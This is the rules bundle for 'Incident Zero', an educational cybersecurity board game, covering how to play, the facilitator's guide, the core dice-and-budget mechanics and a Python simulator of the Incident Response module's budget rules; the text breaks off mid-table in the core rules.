INCIDENT ZERO

Incident Response — Print & Play Bundle · v2.2 Playtest Edition

A cybersecurity board game by RetroVerse Studios · CC BY-NC-SA 4.0

Print this file (Ctrl/Cmd+P) or read on screen. Card pages print best on cardstock.

Contents:
  1. docs/HOW_TO_PLAY.md
  2. docs/TO_GUIDE.md
  3. docs/rules/core-rules.md
  4. docs/rules/module-incident-response.md
  5. docs/standalone-games/incident-response.md
  6. cards/incident-response/core-deck/threat-defense-cards.md
  7. cards/incident-response/expansion-deck/advanced-threats.md
  8. cards/incident-response/expansion-deck/advanced-defenses.md
  9. cards/print-templates/tracker-sheets.md

docs/HOW_TO_PLAY.md

How to Play Incident Zero

Version: 2.2 - Playtest Edition
Read time: ~15 minutes. First game: ~45 minutes.

This is the learn-to-play manual — read it once, run your first game, then use the module rules as reference during play. Exact tables and numbers live in the reference docs; this manual teaches the flow.


1. What Is This Game?

Incident Zero is a cybersecurity board game for classrooms and training rooms. One player is the Threat Orchestrator (TO) — part facilitator, part adversary, part narrator. Everyone else is the Blue Team: security defenders making decisions under budget and time pressure.

The game's signature rule: you get better dice odds by explaining your reasoning like a real analyst. Say "we investigate suspicious activity" and you roll flat. Say "we pull the mail gateway logs to check the sender's real IP against threat intel" and you roll at +3. Talking like a professional is literally how you win — that's the point.

There are 6 modules covering the security lifecycle. Each is a standalone 30-45 minute game; they also chain together (the outcome of one feeds the setup of the next). This manual teaches Incident Response first — it's the flagship and the best hook.

2. What You Need

3. The Core Loop (all modules)

Every module runs on the same engine:

  1. Turns. A fixed number of turns (announced at setup). Each turn: start-of-turn penalties → 2-3 minutes of team discussion → ONE team action → end of turn.
  2. Budget. One shared pool representing money, staff, and time. Every action costs Budget. Run dry and you can't act.
  3. The d20 roll. Uncertain actions need roll + modifiers ≥ 11.
  4. Justification modifiers. +2 for strong technical reasoning (methodology — why this approach works), +1 for naming real tools or techniques (Wireshark, EDR, Mimikatz, a MITRE technique). The TO judges honestly; vague = +0.
  5. Debrief. Every session ends with 5-10 minutes of "what happened, why, what would you do differently." This is where the learning locks in — don't skip it.

4. Your First Game: Incident Response (Beginner)

The setup (TO does this privately, 5 min): An attacker is inside the fictional company's network. The TO secretly builds a 3-card attack chain in kill-chain order and keeps it face-down:

Suggested first chain: T-01 Phishing Campaign (INITIAL COMPROMISE / SOCIAL ENGINEERING) → T-04 Lateral Movement via SMB (PIVOT & ESCALATE / NETWORK) → T-07 Scheduled Task Persistence (PERSISTENCE / MALWARE)

The three actions (Blue Team picks ONE per turn):

| Action | Cost | On success (roll+mods ≥ 11) |
| --- | --- | --- |
| Investigate | 5 | 1st success on a link = the TO gives a clue. 2nd success on the same link = card revealed! |
| Deploy Defense | 10/15/25 by tier | If the card's vector AND chain step match the hidden card = revealed immediately. Partial match = defense stays on the table and gives +2 to future rolls against any link matching its vector |
| Emergency Response | 15 | No roll. Contain one already-revealed threat (removes its ongoing penalty) |

The pressure (TO applies at the START of each turn):
  - Active Breach Cost: -5 Budget while any chain card is still unrevealed (the breach is burning money whether you see it or not)
  - Uncontained Threats: -5 Budget per revealed-but-uncontained threat (revealing the next card in the chain auto-contains the previous one)

When a card is revealed, the team immediately picks ONE reward: draw 2 Defense cards, +10 Budget, or Fast-Track (next Investigate succeeds on 5+).

Scripted opening — read this at the table

TURN 1.
TO: "Start of turn: one attacker action is still hidden — Active Breach Cost, minus 5. Budget: 95. Something is wrong at Meridian Logistics: the helpdesk queue is full of password-reset complaints. What do you do?"
Team (after discussion): "Investigate. We pull the mail gateway logs and check sender domains against our threat-intel feed — if this is phishing, the return-path won't match the display name."
TO: "That's a real methodology and a real tool — +2 and +1. Roll."
Rolls 9. 9+3 = 12 ≥ 11 — success. TO reads a clue from T-01: "Several employees received emails claiming to be from IT, asking them to 're-authenticate'. The link goes to a look-alike domain registered 4 days ago."
(First success on this link — clue only. Budget: 95 - 5 = 90.)

TURN 2.
TO: "Active Breach Cost, minus 5. Budget: 85."
Team: "Keep digging on the phishing — we check the mail gateway for who clicked, and pull those workstations' proxy logs."
TO: "+2, +1. Roll."
Rolls 10. 13 ≥ 11 — second success on the same link. TO flips T-01 face-up: "Phishing Campaign — revealed! Three users entered credentials on the fake page. This threat is now uncontained. Choose a reward."
Team takes Budget Grant: 85 - 5 + 10 = 90.

TURN 3.
TO: "Two cards still hidden: Active Breach minus 5. One uncontained threat: minus 5. Budget: 80. You know how they got in — you don't yet know where they went."
From here, you're on your own. (A strong play: Deploy the Network Segmentation defense — if the next hidden card is network lateral movement, vector + step match reveals it instantly and auto-contains the phishing.)

How it ends

Debrief prompts: What did you spend the most on, and was it worth it? Which clue actually changed your next decision? What one defense, bought before turn 1, would have changed everything?

5. The Other Five Modules (one paragraph each)

Chaining modules: outcomes carry forward (audit gaps raise your DR costs; an IR loss sets up DR; IR's revealed chain seeds Forensics). See Module Combinations. Full lifecycle = all six in sequence, 4-5 hours across sessions.

6. Where to Go Next

| You want... | Read |
| --- | --- |
| You're the Threat Orchestrator | The TO Guide — the role, judging justifications, per-module screens |
| Exact rules for a module | docs/rules/ — core + one file per module |
| Solo/standalone setup for any module | docs/standalone-games/ |
| Every card, indexed | cards/CARD_REFERENCE.md |
| To run a playtest and report back | docs/playtesting/ |
| Variable game length & difficulty tiers | core-rules §3a |

7. Quick Reference (photocopy this)

Roll: d20 + modifiers ≥ 11 · +2 strong justification · +1 real tool/technique named · +2 matching deployed defense (IR)
IR costs: Investigate 5 · Deploy 10/15/25 · Emergency Response 15
IR start-of-turn: -5 while any card hidden · -5 per uncontained revealed threat
Reveal: 2 successful Investigates on a link, or 1 full-match Deploy (vector + step) · always the earliest unrevealed card
Reward per reveal (pick 1): 2 Defense cards / +10 Budget / next Investigate succeeds on 5+
Turn limit: (chain cards × 2) + 1 → 3 cards = 7 turns
Budgets: NB 40-60 · DR 50 · Forensics 75 · IR 100 · Audit 100 · Hardening 150

docs/TO_GUIDE.md

The Threat Orchestrator's Guide

Version: 2.2 - Playtest Edition
Audience: anyone about to run Incident Zero — teacher, trainer, or the friend who volunteered.


1. The Role

The Threat Orchestrator (TO) is Incident Zero's dungeon master. You wear three hats, usually in the same minute:

If you've ever run a tabletop RPG, you already have 80% of this. The remaining 20% is the adjudication rubric in §4 — it's the part that makes this game educational rather than just thematic.

A good TO makes the game. The same scenario is flat or unforgettable depending on how you deliver clues and how honestly you judge reasoning. That's why this guide exists.

2. Golden Rules

  1. Be fair, not nice. Never fudge dice — in either direction. The rules already give you legitimate difficulty dials (§5); use those, not your thumb on the d20.
  2. Never block on ignorance. If players are stuck, sell them a hint through the fiction ("your SOC junior suggests looking at outbound traffic...") rather than letting three turns die in silence.
  3. Announce costs before actions. "That's 15 Budget — confirm?" prevents every argument you'd otherwise have.
  4. Explain outcomes. Success or failure, say why in security terms. The explanation is the lesson; the roll is just pacing.
  5. Keep the clock. 2-3 minutes of planning per turn, firmly. Deliberation past that point is quarterbacking, not strategy.
  6. Let them be wrong. A confidently wrong plan that fails teaches more than a corrected plan that succeeds. Save the correction for the debrief.

3. Session Prep (15 minutes)

4. Judging Justifications (the heart of the job)

The +2/+1 modifiers are the game's teaching engine. Your consistency is what makes them meaningful.

+2 — Strong technical justification. The player explains methodology: what they'll look at, and why that would reveal or stop this specific thing.
  - ✅ "We pull the mail gateway logs and compare the return-path against the display-name domain — spoofed senders won't match." (mechanism stated)
  - ✅ "Deploy EDR because living-off-the-land attacks won't trip signature AV — we need behavioral detection." (threat-to-control logic)
  - ❌ "We investigate the email server thoroughly." (a location is not a method)

+1 — Real tool or technique named. Wireshark, Splunk queries, Mimikatz, a MITRE technique ID, an actual CVE.
  - ✅ "Check LSASS access events — that's Mimikatz behavior, T1003."
  - ❌ "We use our security tools." (no it isn't)

Rulings that keep it fair:
  - Judge the reasoning, not the vocabulary. A beginner saying "check if the email really came from who it says" in plain words has the mechanism — award the +2. A buzzword salad without a mechanism gets +0.
  - Consistency beats generosity. Whatever bar you set on turn 1 is the bar all game.
  - Escalate the bar as the group learns — by session three, "we check the SIEM" that earned +1 in session one should need a specific query. Announce the escalation openly ("you're professionals now — I want specifics").
  - Expert groups ("Expert Mode"): award +2 only for named artifacts, ATT&CK technique IDs, or detection logic. This is the challenge ceiling for practitioner tables — the card math never has to change.
  - One player monologuing every justification? Ask a different player to give it each turn ("Sam, you're on comms — why does this matter to the regulator?").

5. Difficulty Dials (live, legitimate)

Signs it's too easy: no failed rolls; goal in sight with 40+ Budget spare; players bored. Signs it's too hard: no progress for 3+ turns; consecutive failures; frustration replacing discussion.

| Easier (pick 1-2) | Harder (pick 1-2) |
| --- | --- |
| Richer clues (more specific detail per success) | Vaguer clues (accurate but terse) |
| Suggest an angle through the fiction | Expert-mode justification bar |
| Shorter chain / lower tier next game | Longer chain, expansion cards |
| Beginner budgets (module max) | Minimum budgets |

Never adjust by fudging a roll or changing a printed number mid-game — players smell it, and it teaches that outcomes are arbitrary.

6. Failure Modes (yours, not theirs)

| Failure | Symptom | Fix |
| --- | --- | --- |
| The Encyclopedia | You lecture after every roll | One sentence of "why," save the rest for debrief |
| The Softie | Everyone always gets +2 | Re-read §4; require the mechanism |
| The Sphinx | Clues so cryptic nobody moves | Clues must be actionable: each should suggest at least one sensible next investigation |
| The Railroader | You steer them to your solution | Multiple paths are valid; score the outcome, not the route |
| The Accountant | You narrate numbers, not events | Lead with fiction, then state the numbers |
| The Rusher | Debrief skipped because time ran out | Protect the last 10 minutes like it's the win condition — it is |

7. Module Panels (your screen, one per module)

🔎 Incident Response — you are the hidden attacker

🛡️ Hardening — you become the pentester mid-game

🏗️ Network Building — you are the demanding business

🚨 Disaster Recovery — you are the crisis itself

🔬 Forensics — you are the evidence

📋 Audit & Compliance — you are the organization under review

8. Running the Debrief (10 minutes, non-negotiable)

Three rounds, in order: What happened? (players narrate, you correct only facts) → Why did it work that way? (connect two or three key moments to real-world security — this is where you finally get to lecture, briefly) → What would you do differently? (go around the table; everyone answers). Losses debrief better than wins: read any unrevealed cards' "Why This Works" text aloud — it's the payoff for losing.

9. First Session? Do This

  1. Run beginner Incident Response with the scripted opening in How to Play §4 — your first two turns are literally written out
  2. Keep the tracker sheet visible to everyone; public state builds trust in your fairness
  3. Log frictions on the session notes form — your confusion is playtest data too
  4. Forgive yourself one rules mistake per session; announce it, fix it forward, don't replay

docs/rules/core-rules.md

Incident Zero: Core Rules & Mechanics

Version: 2.2 - Playtest Edition
Last Updated: October 2025


Core Concept 🎯

Incident Zero is a modular cybersecurity board game for 2+ players designed for educational environments. One player acts as the Threat Orchestrator (TO) (the facilitator), while all other players form Blue Teams (the Defenders).

How It Works

Players choose which module(s) to play based on learning objectives:

  1. Network Building Module - Design and secure infrastructure (30-45 min)
  2. Hardening Module - Build defense-in-depth (30-45 min)
  3. Incident Response Module - Detect and investigate hidden attack chains (30-45 min)
  4. Disaster Recovery Module - Manage breach crisis (30-45 min)
  5. Forensics Module - Investigate and attribute attacks (30-45 min) NEW in v2.1
  6. Audit & Compliance Module - Conduct security assessments (30-45 min)

Modules can be played solo or combined in any sequence using the modifier generation procedures documented in FRAMEWORK.md and Module Combinations.


Game Components (Universal)

Card Types

Threat Cards

Represent attacker actions. Each card includes:
  - Title: e.g., "Phishing Campaign"
  - Attack Chain Step: INITIAL COMPROMISE, PIVOT & ESCALATE, PERSISTENCE, or C2 & EXFIL
  - Attack Vector: SOCIAL ENGINEERING, WEB EXPLOIT, CREDENTIAL ABUSE, MALWARE, NETWORK, or DATA EXFIL
  - Clue: Descriptive text for the Threat Orchestrator
  - Why This Works: Educational explanation (revealed after discovery)

Deck Composition:
  - 12 Base Threat Cards (see cards/incident-response/core-deck/threat-defense-cards.md)
  - 8 Expansion Threat Cards (see cards/incident-response/expansion-deck/advanced-threats.md)


Defense Cards

Represent security controls. Each card includes:
  - Title: e.g., "Multi-Factor Authentication"
  - Countermeasure Vector: One of the six attack vectors
  - Tier: BASIC (10 Budget), ADVANCED (15 Budget), or ELITE (25 Budget)
  - Description: What the defense does and when it applies

Deck Composition:
  - 24 Base Defense Cards (see cards/incident-response/core-deck/threat-defense-cards.md)
  - 19 Expansion Defenses (see cards/incident-response/expansion-deck/advanced-defenses.md)

Examples:
  - BASIC: Email Authentication Setup, User Security Training, Firewall Rules (10 Budget)
  - ADVANCED: Multi-Factor Authentication, EDR, Network Segmentation (15 Budget)
  - ELITE: Threat Hunting, Memory Forensics, Deception Technology (25 Budget)


Pentester Tactic Cards

Represent sophisticated attack techniques used in the Hardening module (and potentially others).

8 Core Tactics (PT-01 to PT-08):
  1. PT-01: Social Engineering - Pretexting Attack
  2. PT-02: Malware Evasion - Living-off-the-Land Technique
  3. PT-03: Credential Dumping - Mimikatz Attack
  4. PT-04: Lateral Movement - Network Traversal
  5. PT-05: Privilege Escalation - Unpatched Kernel Exploit
  6. PT-06: Data Exfiltration - Unmonitored Channel
  7. PT-07: Supply Chain Compromise - Trusted Software Update
  8. PT-08: Insider Threat - Malicious Administrator

See cards/hardening/core-deck/pentester-tactic-cards.md for full card text, plus 8 expansion tactics (PT-09 to PT-16) in advanced-tactics.md.


Asset Cards

Simple cards providing scenario context. Examples:
  - Email Server
  - Customer Database
  - Domain Controller
  - Web Application
  - Backup System
  - Developer Workstation


Game Materials Required

Physical Components:
  - One 20-sided die (d20)
  - Turn Tracker (paper or board, counts 1-12+)
  - Budget Tracker (shows 0-150+)
  - Reputation/Security Score Tracker (shows 0-100)
  - Uncontained Threats Tracker (shows 0-5)
  - Tokens or counters (for tracking upgrades, penalties)

Optional:
  - Score sheets (printable or paper)
  - Playbook tracking sheet
  - Stakeholder communication log (for Disaster Recovery)


Universal Game Mechanics

1. The d20 Roll System

When Used: Investigation, Defense Deployment, Negotiation, and similar actions that have uncertain outcomes.

How It Works:
  1. Player announces action and parameters
  2. Player rolls 1d20 (one 20-sided die)
  3. Add the applicable modifiers to the roll and compare the total to the target number (usually 11+)
  4. Success if: roll + modifiers ≥ target number

Example:

Action: Investigate email headers
Target: 11+
Roll: 7
Modifiers: +2 (technical justification) +1 (referenced Splunk)
Calculation: 7 + 2 + 1 = 10
Result: FAIL (10 < 11)

2. Budget System (Universal)

What is Budget? Abstract resource representing time, money, personnel, and tools. Spent to take actions, buy defenses, or conduct investigations.

Budget Allocation by Module:
  - Network Building: Start at 40-60 (by difficulty; see module rules)
  - Hardening: Start at 150 (or carry over from IR)
  - Incident Response: Start at 100
  - Disaster Recovery: Start at 50 (emergency fund)
  - Forensics: Start at 75
  - Audit & Compliance: Start at 100 (used only for optional remediation cards)

Budget Spending:
  - Investigate action: 5 Budget
  - Deploy Defense: 10/15/25 Budget (by tier)
  - Emergency Response (IR): 15 Budget (v2.2; was 25)
  - Active Breach Cost (IR, v2.2): -5 Budget at start of each turn while any chain card remains unrevealed
  - Harden Upgrade (Hardening): 5 Budget
  - Create Playbook (Hardening): 10 Budget
  - Crisis Action cards (DR): 5-20 Budget per card (ACTION-01 to ACTION-12; the free "Holding Statement" costs 0)
  - Ransom Decision (DR, ACTION-13): Pay 20 / Negotiate 5 / Refuse 0

Budget = 0: Team loses (cannot take further actions)

Exception (Disaster Recovery, v2.2): Budget floor is 0 and the free Holding Statement action remains available — DR is never lost by running out of Budget; DR's loss condition is any stakeholder trust reaching 0%.


3. Turn System (Universal)

Turns represent: Time passing in the game world (6 hours, 30 minutes, or abstract unit depending on module)

Turn Sequence:
  1. Start of Turn: Penalties applied, trackers announced
  2. Planning Phase: Team discusses strategy (2-3 min)
  3. Action Phase: Execute chosen action, resolve rolls
  4. End of Turn: Advance tracker, draw card, check events


3a. Variable Game Length System (v2.1 - New!)

Philosophy: In real incident response, some attacks move fast (hours), some take months. Fixed turn lengths feel unrealistic. This system adds realism without requiring complex calculations.

For Beginners & Quick Play: Default Formula

Default Formula: (Attack Chain Cards × 2) + 1

This gives attackers enough time to progress realistically while keeping games manageable:

| Attack Chain | Formula | Turn Count | Session Duration |
| --- | --- | --- | --- |
| 3 cards | (3 × 2) + 1 | 7 turns | 30-40 min play |
| 4 cards | (4 × 2) + 1 | 9 turns | 35-45 min play |
| 5 cards | (5 × 2) + 1 | 11 turns | 40-50 min play |
| 6 cards | (6 × 2) + 1 | 13 turns | 45-55 min play |

How to Use Default Formula:
  1. Choose number of threat cards in attack chain (3, 4, 5, or 6)
  2. Apply formula: (Cards × 2) + 1 = Turn Count
  3. Announce turn count to Blue Team
  4. Play game normally with that turn limit

Example Setup:

"I've created a 4-card attack chain. That's (4 × 2) + 1 = 9 turns. You have 9 turns to detect all four threats. Go!"


For Advanced Players: Complexity Tiers (v2.1)

Advanced Threat Orchestrators can use a Tier + d4 system for more control and variability:

Step 1: Select Attack Complexity Tier

| Tier | Turn Base | Attack Profile | Example |
| --- | --- | --- | --- |
| TIER 1 | 5-7 | Simple & obvious | Script kiddie using public tools |
| TIER 2 | 8-10 | Standard sophistication | Organized cybercriminal group |
| TIER 3 | 11-13 | Highly sophisticated | APT with operational security |
| TIER 4 | 14-16 | Expert/Nation-state | State-sponsored group |

Step 2: Add Randomness (Optional)

Roll 1d4 for variation:
  - Roll 1: -1 turn (tight timeline)
  - Roll 2 or 3: ±0 turns (no change)
  - Roll 4: +1 turn (extended dwell time)

Final Turn Count = Tier Base + d4 Result

Example Advanced Setup:

"This is a TIER 2 attack (organized cybercriminals). Base is 8-10 turns. I'll roll d4 for variation... [rolls 4, +1 turn]. Final turn count: 9-11 turns."


Critical Game Integrity Rules (v2.1)

These rules protect game balance and prevent metagaming:

Rule 1: Accept Any Roll (Even If It Feels Wrong)

The Rule: Threat Orchestrators MUST accept the random result, even if it feels impossibly tight or loose.

Why: Real incident response is unpredictable. Sometimes attacks happen faster or slower than expected.

Example Scenarios:
  - TIER 3 attack (11-13 base) + d4 roll of 1 = 10-12 turns (tighter than expected, but realistic)
  - TIER 1 attack (5-7 base) + d4 roll of 4 = 6-8 turns (easier conditions, but acceptable)

When Chaos Feels Realistic:
  - Tight timeline: "The attacker worked faster than expected—they had prior knowledge"
  - Loose timeline: "The attacker was cautious, spending weeks in reconnaissance before striking"

Implementation: Lean into the randomness as realistic incident variability.


Rule 2: Players Cannot Question Tier Based on Turn Count

The Rule: Blue Team CANNOT deduce the attack tier from the announced turn count. They cannot ask "Is this TIER 2?" or "Is this TIER 4?" based on how many turns they have.

Why: Real incident response doesn't come with difficulty labels. Attackers don't advertise sophistication. Players should discover complexity through gameplay (attack chain complexity, defender evasion, tool sophistication, etc.).

What Players CAN Ask:
  - "What are the suspicious network events?" (leads to understanding threats)
  - "Can we analyze the malware?" (reveals attacker sophistication through findings)
  - "Why did this attack succeed?" (post-game discussion)

What Players CANNOT Ask:
  - "Is this a TIER 2 attack?" (deriving tier from turn count)
  - "This looks like a TIER 1 because we have 7 turns" (meta-gaming difficulty)

Implementation: Respond to difficulty questions by saying "Investigate and find out!" Players discover sophistication through evidence, not from turn counts.


Rule 3: TO Modifier Authority (Rare & Optional)

The Rule: ONLY after rolling d4, the Threat Orchestrator may apply an optional ±1 turn adjustment IF the rolled result feels genuinely unreasonable for the scenario.

When to Use (Rare):
  - Scenario setup is unusually complex (multiple attack vectors, coordination across systems)
  - Player group is new and needs slightly easier conditions
  - Real-world incident being taught had specific timeline constraints

When NOT to Use (Prefer Random):
  - "The roll feels unlucky" (accept the chaos)
  - "I want this exactly 10 turns" (let dice decide)
  - "The attack chain is long so it should take longer" (that's what TIER system handles)

Implementation:
  1. Roll d4 normally
  2. Announce rolled result
  3. ONLY IF genuinely unreasonable, apply ±1 modifier and explain why
  4. Document the override for consistency in future scenarios

Example Valid Use:

"TIER 2 base 8-10, rolled -1 = 7-9 turns. That's tight given we have a 5-card attack chain, so I'm adding a +1 modifier (explaining that the discovery is methodical). Final: 8-10 turns."

Example Invalid Use:

"I rolled 8-10 but I want 10-12, so I'm adding +2." (NO - use the roll as-is)


Implementation Checklist

For Beginners (Use Default Formula):
  - [ ] Choose attack chain length (3, 4, 5, or 6 cards)
  - [ ] Calculate: (Cards × 2) + 1
  - [ ] Announce turn count
  - [ ] Play

For Advanced (Use Tier + d4):
  - [ ] Select TIER (1, 2, 3, or 4)
  - [ ] Announce TIER basis (not the number, just why it's that complexity)
  - [ ] Roll d4 for variation (hidden or public, your choice)
  - [ ] Calculate final turn count
  - [ ] Apply Rule 3 modifier if genuinely needed (rare)
  - [ ] Announce final turn count WITHOUT revealing tier


Quick Reference Card

Default Formula: Turn Count = (Attack Cards × 2) + 1

Tier System:
  - TIER 1: 5-7 turns (simple)
  - TIER 2: 8-10 turns (standard)
  - TIER 3: 11-13 turns (advanced)
  - TIER 4: 14-16 turns (expert)
  - Add d4 roll: -1, 0, 0, or +1

Golden Rules:
  1. Accept any roll (embrace chaos)
  2. Never reveal tier to players
  3. Modifier authority only when truly needed (rare)


4. Roll Modifiers (Universal)

All modules use the same modifier system for consistency:

+2 Bonus: Strong Technical Justification

Awarded when a player provides clear, specific reasoning for their action using real security concepts.

Examples:
  - "We're analyzing email headers in the mail gateway logs to identify the true sender IP and check it against threat intelligence feeds"
  - "We're deploying EDR on all endpoints because it can detect living-off-the-land techniques"
  - "We're querying our SIEM for scheduled task creation events because attackers use them for persistence"

Criteria:
  - References specific tools (Splunk, EDR, SIEM, etc.)
  - Explains methodology (why this approach works)
  - Shows understanding of the threat being addressed


+1 Bonus: Real Tools or Techniques Referenced

Awarded when player references actual security tools or real attack/defense techniques.

Examples:
  - "We'll use Wireshark to analyze the network traffic"
  - "We're checking for Mimikatz usage in memory"
  - "We're reviewing EDR telemetry"
  - "We're looking for this specific CVE exploitation pattern"

Criteria:
  - References real tools (Wireshark, EDR, Splunk, etc.)
  - References real techniques (MITRE ATT&CK, specific CVEs)
  - Shows awareness of how things actually work


5. Uncontained Threats Penalty (Incident Response Module)

When Applied: Incident Response module only, applied at START of each turn

How It Works:
  1. When a threat card is revealed, add 1 to Uncontained Threats Tracker
  2. At START of each turn, deduct 5 Budget per uncontained threat
  3. When next card in chain is revealed, previous threat is auto-mitigated (-1 from tracker)
  4. When Emergency Response action is used (15 Budget), remove a revealed threat (-1 from tracker)

Companion rule — Active Breach Cost (v2.2): while at least one chain card remains unrevealed, deduct an additional flat -5 Budget at the start of each turn. Hidden attackers cost money too.

Purpose: Creates urgency - dwell time costs money, whether you've found the attacker yet or not. Teaches real-world incident response costs.

Example (uncontained penalty only; Active Breach Cost also applies while cards remain hidden):

Turn 1: Phishing revealed → Uncontained Threats = 1
Turn 2: START → Deduct 5 Budget (95 remaining from 100)
Turn 3: Lateral Movement revealed → Phishing auto-mitigated (Uncontained = 1)
Turn 3: START → Deduct 5 Budget
Turn 4: Emergency Response on Lateral Movement (15 Budget) → Uncontained Threats = 0
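The Incident Response budget engine described in How to Play §4 (the scripted opening) and in §5 above, as an added simulator that is not part of the RetroVerse bundle: it encodes the two start-of-turn penalties, the action costs, the reveal conditions and the reveal rewards, then replays the scripted opening so the printed Budget figures (95, 90, 85, 90, 80) follow from the rules rather than from the narration. The ChainState class and its method names are this example's own; it assumes the team declares the chain step a Deploy is defending, that a non-matching defense stays on the table for a single +2 against its vector, and that an action the team cannot afford counts as running dry.

```python
from collections import namedtuple
from dataclasses import dataclass, field

INVESTIGATE_COST, EMERGENCY_COST = 5, 15
DEPLOY_COST = {"BASIC": 10, "ADVANCED": 15, "ELITE": 25}
ACTIVE_BREACH_COST = 5     # flat, each turn any chain card is still unrevealed
UNCONTAINED_COST = 5       # per revealed-but-uncontained threat, each turn
TARGET, FAST_TRACK_TARGET = 11, 5   # roll + mods must reach 11 (5 after the Fast-Track reward)

ThreatCard = namedtuple("ThreatCard", "title step vector")    # step and vector as printed on the card
DefenseCard = namedtuple("DefenseCard", "title vector tier")  # tier: BASIC / ADVANCED / ELITE
# The suggested first chain from How to Play section 4.
SUGGESTED_CHAIN = [
    ThreatCard("T-01 Phishing Campaign", "INITIAL COMPROMISE", "SOCIAL ENGINEERING"),
    ThreatCard("T-04 Lateral Movement via SMB", "PIVOT & ESCALATE", "NETWORK"),
    ThreatCard("T-07 Scheduled Task Persistence", "PERSISTENCE", "MALWARE"),
]


@dataclass
class ChainState:
    chain: list
    budget: int = 100
    revealed: int = 0                              # cards face-up; always the earliest first
    uncontained: set = field(default_factory=set)  # indexes of revealed, uncontained cards
    successes: dict = field(default_factory=dict)  # Investigate successes per hidden link
    table: list = field(default_factory=list)      # non-matching defenses left in play (+2 vs vector)
    fast_track: bool = False                       # Fast-Track reward pending

    def start_of_turn(self) -> int:
        """Apply the Active Breach Cost and the Uncontained Threats penalty; return the total."""
        breach = ACTIVE_BREACH_COST if self.revealed < len(self.chain) else 0
        penalty = breach + UNCONTAINED_COST * len(self.uncontained)
        self.budget -= penalty
        return penalty

    def _spend(self, cost: int) -> None:
        if self.budget < cost:   # page: Budget 0 = loss; refusing an unaffordable action is this example's reading
            raise RuntimeError("Budget exhausted: the team cannot act")
        self.budget -= cost

    def _passes(self, roll, link, justification, tool, target) -> bool:
        """d20 + justification (+2) + tool (+1), +2 once if a tabled defense matches the link's vector."""
        table_bonus = 2 if any(d.vector == self.chain[link].vector for d in self.table) else 0
        return roll + justification + tool + table_bonus >= target

    def _reveal_next(self, reward: str) -> str:
        """Flip the earliest unrevealed card (auto-contains the previous one) and apply the reward."""
        idx = self.revealed
        self.uncontained.discard(idx - 1)
        self.uncontained.add(idx)
        self.revealed += 1
        if reward == "budget":
            self.budget += 10
        elif reward == "fast_track":
            self.fast_track = True   # "cards" (draw 2 Defense cards) has no Budget effect here
        return self.chain[idx].title

    def investigate(self, link, roll, justification=0, tool=0, reward="budget"):
        """Returns 'fail', 'clue' (first success on the link) or the title of the revealed card."""
        self._spend(INVESTIGATE_COST)
        target = FAST_TRACK_TARGET if self.fast_track else TARGET
        self.fast_track = False   # the reward is used up by this Investigate, pass or fail
        if not self._passes(roll, link, justification, tool, target):
            return "fail"
        self.successes[link] = self.successes.get(link, 0) + 1
        return "clue" if self.successes[link] < 2 else self._reveal_next(reward)

    def deploy(self, defense, step, roll, justification=0, tool=0, reward="cards"):
        """Deploy against the earliest hidden card; the team declares the step it defends (assumption:
        Defense cards print only a vector). Vector AND step match = reveal; otherwise it stays tabled."""
        link = self.revealed
        self._spend(DEPLOY_COST[defense.tier])
        if not self._passes(roll, link, justification, tool, TARGET):
            return "fail"
        if defense.vector == self.chain[link].vector and step == self.chain[link].step:
            return self._reveal_next(reward)
        self.table.append(defense)
        return "stays"

    def emergency_response(self, link: int) -> None:
        """No roll: contain one already-revealed threat, removing its per-turn penalty."""
        if link not in self.uncontained:
            raise ValueError("Emergency Response targets a revealed, uncontained threat")
        self._spend(EMERGENCY_COST)
        self.uncontained.discard(link)


def scripted_opening():
    """Replay How to Play section 4, turns 1-3, plus its suggested turn-3 Deploy; return (state, snapshots)."""
    s = ChainState(SUGGESTED_CHAIN)
    steps = [
        lambda: s.start_of_turn(),                              # turn 1: -5 -> 95
        lambda: s.investigate(0, 9, justification=2, tool=1),   # 9+3 = 12: clue, -5 -> 90
        lambda: s.start_of_turn(),                              # turn 2: -5 -> 85
        lambda: s.investigate(0, 10, 2, 1, reward="budget"),    # 13: T-01 revealed, 85-5+10 = 90
        lambda: s.start_of_turn(),                              # turn 3: -5 breach, -5 uncontained -> 80
        lambda: s.deploy(DefenseCard("Network Segmentation", "NETWORK", "ADVANCED"), "PIVOT & ESCALATE", 12),  # -> 65
    ]
    return s, [(step(), s.budget) for step in steps]
```

The turn-3 Deploy uses a constructed roll of 12; with a full vector + step match it reveals T-04 and auto-contains T-01, so the next start of turn costs 10 (one hidden card, one uncontained threat).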

Common Roles & Responsibilities

Threat Orchestrator (Facilitator)

Responsibilities:
  - Manage game state and track turns/budget
  - Describe scenarios and outcomes
  - Roll dice when action outcomes are uncertain
  - Guide the narrative

During Incident Response:
  - Create and manage hidden attack chain
  - Provide clues based on successful investigations
  - Control Uncontained Threats penalties
  - Be fair but challenging

During Other Modules:
  - Describe threat context and defenses
  - Draw Pentester Tactic cards (Hardening)
  - Manage timeline and deadlines (Disaster Recovery)
  - Guide debrief questions

Universal Tips:
  - Explain why actions succeed or fail
  - Ask clarifying questions about player strategy
  - Balance challenge with learning
  - Provide constructive feedback


Blue Team (Defenders)

Responsibilities:
  - Discuss strategy as a team
  - Choose one action per turn
  - Justify your decisions (gain +2 modifier)
  - Manage budget carefully
  - Learn from success and failure


Modifier Stacking Rules

Key Rule: Modifiers are additive and can stack.

Example (Hardening Module, canonical formula — v2.2):

Pentester Tactic: PT-02 Living-off-the-Land (DC 13)

Defense roll = d20
  + printed bonus for the ONE defense chosen (D-08 EDR vs PT-02: +3)
  + hardening upgrades on that defense (+2 each; one upgrade: +2)
  + relevant playbook (+3)

Team rolls 8:
8 + 3 (EDR) + 2 (upgrade) + 3 (playbook) = 16 ≥ 13 = SUCCESS

Only the single chosen defense's printed bonus applies — deployed defenses do not stack with each other against one tactic.


Difficulty & Scaling

By Attack Chain Length

| Length | Difficulty | Best For |
| --- | --- | --- |
| 3 cards | Beginner | Learning mechanics, 30 min sessions |
| 4 cards | Intermediate | Standard play, 40 min sessions |
| 5 cards | Advanced | Challenge play, full kill chain |

By Starting Budget

| Budget | Difficulty | Best For |
| --- | --- | --- |
| 60 | Hard | Resource scarcity, tough choices |
| 100 | Standard | Balanced play, most scenarios |
| 150+ | Easy | Strategic depth, multiple options |

By Turn Limit

| Turns | Difficulty | Best For |
| --- | --- | --- |
| 8 | Hard | Time pressure, fast play |
| 10 | Standard | Balanced, most scenarios |
| 12 | Easy | Exploration, learning |

Note (v2.2): Incident Response derives its turn limit from the Variable Game Length formula — (Attack Chain Cards × 2) + 1 → 7/9/11 turns (see §3a). The table above is for modules with educator-set limits.


Educational Objectives

By Module

| Module | Primary Learning | Secondary Learning |
